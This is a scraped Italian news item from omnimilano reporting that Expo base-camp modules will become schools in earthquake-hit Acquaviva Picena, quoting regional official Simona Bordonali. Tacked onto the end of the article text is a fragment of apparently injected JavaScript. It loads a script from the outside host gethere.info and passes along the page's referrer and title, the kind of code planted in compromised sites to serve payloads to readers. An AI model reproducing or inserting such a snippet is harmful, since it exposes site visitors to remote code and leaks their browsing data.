"/>
mercoledì 23 agosto 2017 14:02:14
omnimilano

Terremoto, le strutture del campo base di Expo diventeranno moduli per le scuole di Acquaviva

14 settembre 2016 Cronaca, Politica

“Alcuni manufatti usati nel campo base Expo sono tecnicamente modulabili e potranno quindi essere usati (previa qualche miglioria) come scuole nel comune di Acquaviva Picena”. Lo fa sapere l’assessore regionale alla Sicurezza, Protezione civile e Immigrazione, Simona Bordonali, ricordando che in questi giorni ci sono stati numerosissimi contatti fra la Direzione regionale Protezione civile, la societa’ Edil Sider (incaricata da Expo per la realizzazione dei manufatti), e la Direzione di Comando e Controllo (Dicomac) della Protezione civile. “Dal Dipartimento nazionale – spiega Bordonali – abbiamo appena ricevuto le precise caratteristiche tecniche e le dimensioni dei manufatti necessari al comune di Acquaviva. Queste caratteristiche saranno inoltrate alla societa’ Edil Sider per una verifica finale e per la costruzione di un layout di massima per l’intervento”. “Terminate queste operazioni – conclude Bordonali – il Dipartimento ci fara’ sapere come questi moduli potranno essere destinati al comune di Acquaviva”.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo